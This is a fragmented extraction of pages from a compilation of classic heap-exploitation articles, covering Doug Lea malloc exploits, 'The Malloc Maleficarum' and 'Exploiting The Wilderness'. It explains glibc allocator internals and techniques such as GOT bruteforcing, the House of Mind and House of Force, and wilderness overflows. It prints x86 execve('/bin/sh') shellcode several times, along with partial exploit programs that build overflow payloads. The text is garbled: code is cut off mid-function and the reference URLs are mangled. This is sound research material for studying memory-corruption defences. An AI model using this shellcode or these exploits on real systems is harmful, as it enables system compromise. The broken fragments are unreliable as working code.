Exploit code bruteforcing libc's GOT is able to exploit the vulnerable
CVS servers without any hardcoded addresses in at least the above
mentioned default distributions.
The following code bruteforces itself. The process tries to find himself,
to finally end in an useless endless loop.
#include <stdio.h>
#include <fcntl.h>
#define PREV_INUSE 1
#define IS_MMAP 2
#define NON_MAIN_ARENA 4
if(sz<13) sz = 13;
Page
260
[7. Advanced Doug lea's malloc exploits - jp]
free(unlinkMe+SOMEOFFSET(sz));
return unlinkMe;
}
/* just force some libc function calls between each bruteforcing iteration
*/
void do_little(void){
int w,r;
char buf[256];
sleep(0);
w = open("/dev/null",O_WRONLY);
r = open("/dev/urandom",O_RDONLY);
read(r,buf,sizeof(buf));
write(w,buf,sizeof(buf));
close(r);
close(w);
return;
}
Page
261
[7. Advanced Doug lea's malloc exploits - jp]
}
if(!bin){
printf("failed\n");
return 0;
}
$ ./got_bf
$ ./got_bf 143
Page
262
[7. Advanced Doug lea's malloc exploits - jp]
$ ./got_bf 154
$ ./got_bf 155
$ ./got_bf 158
$ ./got_bf 180
$ ./got_bf 183
Page
263
[7. Advanced Doug lea's malloc exploits - jp]
--] 4.5.5 Arena corruption (top, last remainder and bin modification)
---------------------------------------------------------------------------
--] 4.6 Copying the shellcode 'by hand'
Other trick that allows the attacker to know the exact location of the
injected shellcode, is copying the shellcode to a fixed address using the
aa4bmo primitive.
As we can't write any value, using unaligned writes is needed to create
the shellcode in memory, writting 1 or 2 bytes each time.
We need to be able to copy the whole shellcode before the server crashes
in order to use this technique.
---------------------------------------------------------------------------
--] 5 Conclusions
Page
264
[7. Advanced Doug lea's malloc exploits - jp]
---------------------------------------------------------------------------
--] 6 Thanks
I'd like to thank a lot of people: 8a, beto, gera, zb0, raddy, juliano,
kato, javier burroni, fgsch, chipi, MaXX, lck, tomas, lau, nahual, daemon,
module, ...
Classifying you takes some time (some 'complex' ppl), so I'll just say
thank you for encouraging me to write this article, sharing your ideas,
letting me learn a lot from you every day, reviewing the article,
implementing the morecore idea for first time, being my friends, asking
for torta, not making torta, personal support, coding nights, drinking
beer, ysm, roquefort pizza, teletubbie talking, making work very
interesting, making the world a happy place to live, making people hate
you because of the music...
(you should know which applies for you, do not ask)
---------------------------------------------------------------------------
--] 7 References
[1] http://www.malloc.de/malloc/ptmalloc2.tar.gz
ftp://g.oswego.edu/pub/misc/malloc.c
[2] www.phrack.org/phrack/57/p57-0x08
Vudo - An object superstitiously believed to embody magical power
Michel "MaXX" Kaempf
[3] www.phrack.org/phrack/57/p57-0x09
Once upon a free()
anonymous
[4] http://www.phrack.org/show.php?p=59&a=7
Advances in format string exploitation
gera and riq
[5] http://www.coresecurity.com/common/showdoc.php? \
idx=359&idxseccion=13&idxmenu=32
About exploits writing
gera
[6] http://online.securityfocus.com/bid/5363
[7] http://security.e-matters.de/advisories/012003.txt
[8] http://www.openwall.com/advisories/OW-002-netscape-jpeg.txt
JPEG COM Marker Processing Vulnerability in Netscape Browsers
Solar Designer
[9] http://lists.insecure.org/lists/bugtraq/2000/Nov/0086.html
Local root exploit in LBNL traceroute
Michel "MaXX" Kaempf
[10] http://www.w00w00.org/files/articles/heaptut.txt
w00w00 on Heap Overflows
Matt Conover & w00w00 Security Team
[11] http://www.phrack.org/show.php?p=49&a=14
Smashing The Stack For Fun And Profit
Aleph One
[12] http://phrack.org/show.php?p=55&a=8
The Frame Pointer Overwrite
klog
[13] http://www.phrack.org/show.php?p=59&a=9
Bypassing PaX ASLR protection
[email protected]
[14] http://phrack.org/show.php?p=58&a=4
The advanced return-into-lib(c) exploits
Nergal
Page
265
[7. Advanced Doug lea's malloc exploits - jp]
---------------------------------------------------------------------------
Appendix I - malloc internal structures overview
These are the macros used to index into bins depending of its size:
#define MAX_SMALLBIN 63
#define MAX_SMALLBIN_SIZE 512
#define SMALLBIN_WIDTH 8
#define is_small_request(nb) ((nb) < MAX_SMALLBIN_SIZE - SMALLBIN_WIDTH)
#define smallbin_index(sz) (((unsigned long)(sz)) >> 3)
#define bin_index(sz)
\
(((((unsigned long)(sz)) >> 9) == 0) ? (((unsigned long)(sz)) >>
3):\
((((unsigned long)(sz)) >> 9) <= 4) ? 56 + (((unsigned long)(sz)) >>
6):\
((((unsigned long)(sz)) >> 9) <= 20) ? 91 + (((unsigned long)(sz)) >>
9):\
((((unsigned long)(sz)) >> 9) <= 84) ? 110 + (((unsigned long)(sz)) >>
12):\
((((unsigned long)(sz)) >> 9) <= 340) ? 119 + (((unsigned long)(sz)) >>
15):\
((((unsigned long)(sz)) >> 9) <= 1364) ? 124 + (((unsigned long)(sz)) >>
18):\
126)
Page
266
[7. Advanced Doug lea's malloc exploits - jp]
These are the macros used along the source code to access the bins,
we can see the first two bins are never indexed; they refer to the
topmost chunk, the last_remainder chunk and a bitvector used to
improve seek time, though this is not really important for us.
Page
267
[7. Advanced Doug lea's malloc exploits - jp]
The main_arena is the place where the allocator stores the 'bins' to which
the free chunks are linked depending on they size.
The little graph below resumes all the structures detailed before:
.
.
.
[bin_X]
ptr] ----> [<- fd
[ lonely but interesting chunk
ptr] ----> [<- bk
.
.
Page
268
[8. The Malloc Maleficarum - Phantasmal Phantasmagoria]
by Phantasmal Phantasmagoria
[email protected]
[--------------------------------
In late 2001, "Vudo Malloc Tricks" and "Once Upon A free()" defined
the exploitation of overflowed dynamic memory chunks on Linux. In
late 2004, a series of patches to GNU libc malloc implemented over
a dozen mandatory integrity assertions, effectively rendering the
existing techniques obsolete.
[--------------------------------
[--------------------------------
Page
269
[8. The Malloc Maleficarum - Phantasmal Phantasmagoria]
void
_int_free(mstate av, Void_t* mem)
{
mchunkptr p; /* chunk corresponding to mem */
INTERNAL_SIZE_T size; /* its size */
mfastbinptr* fb; /* associated fastbin */
...
p = mem2chunk(mem);
size = chunksize(p);
Note that the designer does not control the value of p. It can
therefore be assumed that the test for misalignment will fail. On
the other hand, the designer does control the value of size. In
fact, it is the most important aspect of control that the designer
possesses, yet its range is already being limited. For the the
House of Prime the exact upper limit of size is not important. The
lower limit, however, is crucial in the correct execution of this
technique. The chunksize() macro is defined as follows:
set_fastchunks(av);
fb = &(av->fastbins[fastbin_index(size)]);
Page
270
[8. The Malloc Maleficarum - Phantasmal Phantasmagoria]
p->fd = *fb;
*fb = p;
}
This is the fastbin code. Exactly what a fastbin is and why they
are used is beyond the scope of this document, but remember that
the first step in the House of Prime is to overwrite the fastbin
maximum size variable, av->max_fast. In order to do this the
designer must first provide a chunk with the lower limit size,
which was derived above. Given that the default value of av-
>max_fast is 72 it is clear that the fastbin code will be used for
such a small size. However, exactly why this results in the
corruption of av->max_fast is not immediately apparent.
...
INTERNAL_SIZE_T max_fast;
mfastbinptr fastbins[NFASTBINS];
mchunkptr top;
...
Page
271
[8. The Malloc Maleficarum - Phantasmal Phantasmagoria]
Due to the fact that the arena structure and the arena_key come
from different source files, exactly when this does and doesn't
happen depends on how the target libc was compiled and linked. I
have seen the cards fall both ways, so it is an important point to
make. For now it will be assumed that the arena_key is at a higher
address, and is thus over-writable by the fastbin code.
Page
272
[8. The Malloc Maleficarum - Phantasmal Phantasmagoria]
Void_t*
public_mALLOc(size_t bytes)
{
mstate ar_ptr;
Void_t *victim;
...
arena_get(ar_ptr, bytes);
if(!ar_ptr)
return 0;
victim = _int_malloc(ar_ptr, bytes);
...
return victim;
}
Once execution passes to _int_malloc() there are two ways for the
designer to proceed. The first is to use the fastbin allocation
code:
Void_t*
_int_malloc(mstate av, size_t bytes)
{
INTERNAL_SIZE_T nb; /* normalized request size */
unsigned int idx; /* associated bin index */
mfastbinptr* fb; /* associated fastbin */
mchunkptr victim; /* inspected/selected chunk */
checked_request2size(bytes, nb);
Page
273
[8. The Malloc Maleficarum - Phantasmal Phantasmagoria]
fb = &(av->fastbins[idx]);
if ( (victim = *fb) != 0) {
if (fastbin_index (chunksize (victim)) != idx)
malloc_printerr (check_action, "malloc(): memory"
" corruption (fast)", chunk2mem (victim));
*fb = victim->fd;
check_remalloced_chunk(av, victim, nb);
return chunk2mem(victim);
}
}
for(;;) {
while ( (victim = unsorted_chunks(av)->bk) !=
unsorted_chunks(av)) {
bck = victim->bk;
Page
274
[8. The Malloc Maleficarum - Phantasmal Phantasmagoria]
size = chunksize(victim);
if (in_smallbin_range(nb) &&
bck == unsorted_chunks(av) &&
victim == av->last_remainder &&
(unsigned long)(size) > (unsigned long)(nb + MINSIZE)) {
...
}
unsorted_chunks(av)->bk = bck;
bck->fd = unsorted_chunks(av);
if (size == nb) {
...
return chunk2mem(victim);
}
...
[--------------------------------
Perhaps the most useful and certainly the most general technique in
the Malloc Maleficarum is the House of Mind. The House of Mind has
the distinct advantage of causing a direct memory overwrite with
just a single call to free(). In this sense it is the closest
relative in the Malloc Maleficarum to the traditional unlink()
technique.
Page
275
[8. The Malloc Maleficarum - Phantasmal Phantasmagoria]
void
public_fREe(Void_t* mem)
{
mstate ar_ptr;
mchunkptr p; /* chunk corresponding to mem */
...
p = mem2chunk(mem);
...
ar_ptr = arena_for_chunk(p);
...
_int_free(ar_ptr, mem);
#define heap_for_ptr(ptr) \
((heap_info *)((unsigned long)(ptr) & ~(HEAP_MAX_SIZE-1)))
#define arena_for_chunk(ptr) \
(chunk_non_main_arena(ptr)?heap_for_ptr(ptr)->ar_ptr:&main_arena)
Page
276
[8. The Malloc Maleficarum - Phantasmal Phantasmagoria]
bck = unsorted_chunks(av);
fwd = bck->fd;
Page
277
[8. The Malloc Maleficarum - Phantasmal Phantasmagoria]
p->bk = bck;
p->fd = fwd;
bck->fd = p;
fwd->bk = p;
set_fastchunks(av);
fb = &(av->fastbins[fastbin_index(size)]);
...
p->fd = *fb;
*fb = p;
}
Page
278
[8. The Malloc Maleficarum - Phantasmal Phantasmagoria]
[--------------------------------
The House of Force works by tricking the top code in to setting the
wilderness pointer to an arbitrary value, which can result in an
arbitrary chunk of data being returned to the requesting
application. This requires two calls to malloc(). The major
disadvantage of the House of Force is that the first call must have
a completely designer controlled request size. The second call must
simply be large enough to trigger the wilderness code, while the
chunk returned must be (to some extent) designer controlled.
Void_t*
_int_malloc(mstate av, size_t bytes)
{
INTERNAL_SIZE_T nb; /* normalized request size */
mchunkptr victim; /* inspected/selected chunk */
INTERNAL_SIZE_T size; /* its size */
mchunkptr remainder; /* remainder from a split */
Page
279
[8. The Malloc Maleficarum - Phantasmal Phantasmagoria]
Once the wilderness pointer has been set to the arbitrary remainder
chunk, any calls to malloc() with a large enough request size to
trigger the top chunk will be serviced by the designer's
wilderness. Thus the only restriction on the new wilderness is that
the size must be larger than the request that is triggering the top
code. In the case of the wilderness being set to overflow a GOT
entry this is never a problem. It is then simply a matter of
finding an application specific scenario in which such a call to
malloc() is used for a designer controlled buffer.
Page
280
[8. The Malloc Maleficarum - Phantasmal Phantasmagoria]
[--------------------------------
Void_t*
_int_malloc(mstate av, size_t bytes)
{
....
checked_request2size(bytes, nb);
if (in_smallbin_range(nb)) {
Page
281
[8. The Malloc Maleficarum - Phantasmal Phantasmagoria]
idx = smallbin_index(nb);
bin = bin_at(av,idx);
Note that in order to reach the actual smallbin unlink code there
must be at least one chunk in the bin corresponding to the
smallbin_index() for the current request. Assume that a small chunk
of data size N has previously been passed to free(), and that it
has made its way into the corresponding smallbin for chunks of
absolute size (N + 8). Assume that the designer can overflow this
chunk with arbitrary data. Assume also that the designer can
subsequently trigger a call to malloc() with a request size of N.
Page
282
[8. The Malloc Maleficarum - Phantasmal Phantasmagoria]
This rules out pointing the victim chunk at a GOT or .dtors entry.
Instead, the designer must point victim to a position on the stack
such that victim->bk is a pointer to writable memory yet still
close enough to a saved return address such that it can be
overwritten by the application's general use of the chunk.
Alternatively, an application specific approach may be taken that
targets the use of function pointers. Whichever method used, the
arbitrary malloc() chunk must be designer controlled to some extent
during its use by the application.
For the House of Lore, the only other interesting situation is when
the overflowed chunk is large. In this context large means anything
bigger than the maximum smallbin chunk size. Again, it is necessary
for the overflowed chunk to have previously been processed by
free() and to have been put into a largebin by malloc().
victim = last(bin);
..
size = chunksize(victim);
remainder_size = size - nb;
Page
283
[8. The Malloc Maleficarum - Phantasmal Phantasmagoria]
bck = victim->bk;
bin->bk = bck;
bck->fd = bin;
There are only two conditions. The first is exactly the same as the
case of smallbin corruption, the bk pointer of the arbitrary chunk
being returned to the application must point to writable memory (or
the setting of bck->fd will cause a segmentation fault).
The other condition is not obvious from the limited code that has
been presented above. If the remainder_size value is not less than
MINSIZE, then glibc malloc attempts to split off a chunk at victim
+ nb. This includes calling the set_foot() macro with victim + nb
and remainder_size as arguments. In effect, this tries to set
victim + nb + remainder_size to remainder_size. If the
chunksize(victim) (and thus remainder_size) is not designer
controlled, then set_foot() will likely try to set an area of
memory that isn't mapped in to the address space (or is read-only).
[--------------------------------
Page
284
[8. The Malloc Maleficarum - Phantasmal Phantasmagoria]
There is one more requirement for the layout of the fakechunk data
which will be described shortly. For the moment, assume that all of
the above conditions have been met, and that a call to free() is
made on the suitable fakechunk. A call to free() is handled by a
wrapper function called public_fREe():
void
public_fREe(Void_t* mem)
{
mstate ar_ptr;
mchunkptr p; /* chunk corresponding to mem */
...
p = mem2chunk(mem);
if (chunk_is_mmapped(p))
{
munmap_chunk(p);
return;
}
...
ar_ptr = arena_for_chunk(p);
...
_int_free(ar_ptr, mem);
Page
285
[8. The Malloc Maleficarum - Phantasmal Phantasmagoria]
[--------------------------------
Page
286
[8. The Malloc Maleficarum - Phantasmal Phantasmagoria]
The virtual adept does not own the information it creates, and thus
has no right or desire to profit from it. The virtual adept exists
purely to manifest the infinite potential of information in to
information itself, and to minimize the complexity of an
information request in a way that will benefit all conscious
entities. What is not information is not consequential to the
virtual adept, not money, not fame, not power.
Am I a hacker? No.
I am a student of virtuality.
I am the witch malloc,
I am the cult of the otherworld,
and I am the entropy.
I am Phantasmal Phantasmagoria,
and I am a virtual adept.
[--------------------------------
Page
287
[9. Exploiting The Wilderness - Phantasmal Phantasmagoria]
1 - Introduction
1.1 Prelude
1.2 The wilderness
2 - Exploiting the wilderness
2.1 Exploiting the wilderness with malloc()
2.2 Exploiting the wilderness with an off-by-one
3 - The wilderness and free()
4 - A word on glibc 2.3
5 - Final thoughts
- ------------------------------------
- ---- Prelude
/* START wilderness.c */
#include <stdio.h>
Page
289
[9. Exploiting The Wilderness - Phantasmal Phantasmagoria]
Keep in mind that the prev_size field is not used by dlmalloc if the
previous chunk is allocated, and in that situation can become part of
the data of the previous chunk to decrease wastage. The wilderness chunk
does not utilize prev_size (there is no possibility of the top chunk
being consolidated) meaning it is included at the end of the 'first'
buffer at [A] as part of its 1020 bytes of data. Again, the same applies
to the 'second' buffer at [C].
The wilderness chunk being handled specially by the dlmalloc system led
to Michel "MaXX" Kaempf stating in his 'Vudo malloc tricks' [2] article,
"The wilderness chunk is one of the most dangerous opponents of the
attacker who tries to exploit heap mismanagement". It is this special
handling of the wilderness that we will be manipulating in our exploits,
turning the dangerous opponent into, perhaps, an interesting conquest.
- ------------------------------------
Looking at our sample code above we can see that a typical buffer overflow
exists at [B]. However, in this situation we are unable to use the
traditional
unlink technique due to the overflowed buffer being contiguous to the
wilderness and the lack of a relevant call to free(). This leaves us
with the second call to malloc() at [C] - we will be exploiting the special
code used to set up our 'second' buffer from the wilderness.
Based on the knowledge that the 'first' buffer borders the wilderness,
it is clear that not only can we control the prev_size and size elements
of the top chunk, but also a considerable amount of space after the chunk
header. This space is the top chunk's unused data area and proves crucial
in forming a successful exploit.
Lets have a look at the important chunk_alloc() code called from our
malloc() requests:
Page
290
[9. Exploiting The Wilderness - Phantasmal Phantasmagoria]
victim = top(ar_ptr);
set_head(victim, nb | PREV_INUSE);
top(ar_ptr) = chunk_at_offset(victim, nb);
set_head(top(ar_ptr), remainder_size | PREV_INUSE);
return victim;
Page
291
[9. Exploiting The Wilderness - Phantasmal Phantasmagoria]
Finally, we can reach our call to chunk_free(). Lets look at the important
bits:
INTERNAL_SIZE_T hd = p->size;
...
if (!hd & PREV_INUSE)) /* consolidate backward */ /* [A] */
{
prevsz = p->prev_size;
p = chunk_at_offset(p, -(long)prevsz); /* [B] */
sz += prevsz;
if (p->fd == last_remainder(ar_ptr))
islr = 1;
else
unlink(p, bck, fwd);
}
Page
292
[9. Exploiting The Wilderness - Phantasmal Phantasmagoria]
This leaves us with one other choice; creating a fake chunk relatively
positive to the start of the wilderness. This can be achieved by setting
p->prev_size to a small negative number, turned in to a small positive
number at [B]. This would require the specially crafted forward and back
pointers to be situated at the start of the wilderness' unused data area,
just after the chunk header. Similar to the overflowed size variable
discussed above, this is convinient as the negative number need not contain
NULL bytes, allowing us to continue the payload into the data area.
|...AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPPPP|SSSSWWWWFFFFBBBBWWWWWWWW...|
We're now ready to write our exploit for the vulnerable code discussed
above. Keep in mind that a malloc request for 1020 is padded up to 1024
to contain room for the size field, so we are exactly contiguous to the
wilderness.
Page
293
[9. Exploiting The Wilderness - Phantasmal Phantasmagoria]
0x8049680 | polygoria!
/* START exploit.c */
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
p = payload;
memset(p, '\x90', 1052);
p += 4;
*(p) = '\0';
/* START wilderness2.c */
#include <stdio.h>
Page
294
[9. Exploiting The Wilderness - Phantasmal Phantasmagoria]
Looking at this sample code we can see the off-by-one error occuring
at [A]. The loop copies 1021 bytes of argv[1] into a buffer, 'first',
allocated only 1020 bytes. As the 'first' buffer was split off the top
chunk in its allocation, it is exactly contiguous to the wilderness.
This means that our one byte overflow destroys the least significant
byte of the top chunk's size field.
Assuming that our larger second request to malloc() will attempt to extend
the heap, we now have to address the other steps in running the fencepost
chunk_free() call. We know that we can comfortably reach the fencepost
code as we are modifying the size element of the wilderness. The inner
if statement leading to the chunk_free() is usually triggered as either
our old_top_size is greater than 16, or the wilderness' size is small
enough that controlling the least significant byte is enough to make
old_top_size wrap around when MINSIZE is subtracted from it. Finally,
the chunk header modifying calls are unimportant, so long as they occur
in allocated memory as to avoid a premature segfault. The reason for
this will become clear in a short while. All we have left to do is to
ensure that the PREV_INUSE bit is cleared for backwards consolidation
at the chunk_free(). This is made trivial by our control of the size
field.
Page
295
[9. Exploiting The Wilderness - Phantasmal Phantasmagoria]
|FFFFBBBBDDDDDDDDD...DDDDDDDDPPPP|SWWWWWWWWWWW...|
/* START exploit2.c */
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
Page
296
[9. Exploiting The Wilderness - Phantasmal Phantasmagoria]
p = payload;
memset(p, '\x90', 1028);
*(p + 1021) = '\0';
- ------------------------------------
Page
297
[9. Exploiting The Wilderness - Phantasmal Phantasmagoria]
/* START wilderness3a.c */
#include <stdio.h>
INTERNAL_SIZE_T hd = p->size;
INTERNAL_SIZE_T sz;
...
mchunkptr next;
INTERNAL_SIZE_T nextsz;
...
sz = hd & ~PREV_INUSE;
next = chunk_at_offset(p, sz);
nextsz = chunksize(next); /* [A] */
if (next == top(ar_ptr))
{
sz += nextsz; /* [B] */
Here we see the code from chunk_free() used to handle requests involving
the wilderness. Note that the backward consolidation within the 'top'
code at [C] is uninteresting as we do not control the needed prev_size
element. This leaves us with the hope of using the following call to
malloc() as described above.
In this situation we control the value of nextsz at [A]. We can see that
the chunk being freed is consolidated with the wilderness. We can control
the new wilderness' size as it is adjusted with our nextsz at [B], but
unfortunately, the PREV_INUSE bit is set at the call to set_head() at
[D]. The reason this is a bad thing becomes clear when considering the
Page
298
[9. Exploiting The Wilderness - Phantasmal Phantasmagoria]
Keeping with the idea of exploiting the following call to malloc() using
the fencepost code, there are a few other options - all of which appear
to be impossible. Firstly, forward consolidation. This is made unlikely
by the fencepost chunk header modifying calls discussed above, as they
usually ensure that the test for forward consolidation will fail. The
frontlink() macro has been discussed [2] as another possible method of
exploiting dlmalloc, but since we do not control any of the traversed
chunks this technique is uninteresting. The final option was to use the
fencepost chunk header modifying calls to partially overwrite a GOT entry
to point into an area of memory we control. Unfortunately, all of these
modifying calls are aligned, and there doesn't seem to be anything else
we can do with the values we can write.
Now that we have determined what is impossible, lets have a look at what
we can do when involving the wilderness and free():
/* START wilderness3b.c */
#include <stdio.h>
The general aim of this contrived example is to avoid the special 'top'
code discussed above. The wilderness can be overflowed at [A], but this
is directly followed by a call to free(). Fortunately, the chunk to be
freed is not bordering the wilderness, and thus the 'top' code is not
invoked. To exploit this we will be using forward consolidation at [B],
the first call to free().
/* consolidate forward */
if (!(inuse_bit_at_offset(next, nextsz)))
{
sz += nextsz;
At the first call to free() 'next' points to our 'second' buffer. This
means that the test for forward consolidation looks at the size value
of the wilderness. To trigger the unlink() on our 'next' buffer we need
to overflow the wilderness' size field to clear the PREV_INUSE bit. Our
payload will look like this:
Page
299
[9. Exploiting The Wilderness - Phantasmal Phantasmagoria]
|FFFFBBBBDDDDDDDD...DDDDDDDD|SSSSWWWWWWWWWWWWWWWW...|
/* START exploit3b.c */
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
p = payload;
memset(p, '\x90', 1052);
p += sizeof(shellcode) + 32;
*(long *) p = -4;
p += 4;
*(p) = '\0';
Page
300
[9. Exploiting The Wilderness - Phantasmal Phantasmagoria]
- ------------------------------------
- ------------------------------------
- ------------------------------------
[1] http://www.phrack.org/show.php?p=61&a=6
[2] http://www.phrack.org/show.php?p=57&a=8
[3] http://www.phrack.org/show.php?p=57&a=9
[4] http://gee.cs.oswego.edu/dl/html/malloc.html
[5] http://www.memorymanagement.org/glossary/f.html#fencepost
- ------------------------------------
Page
301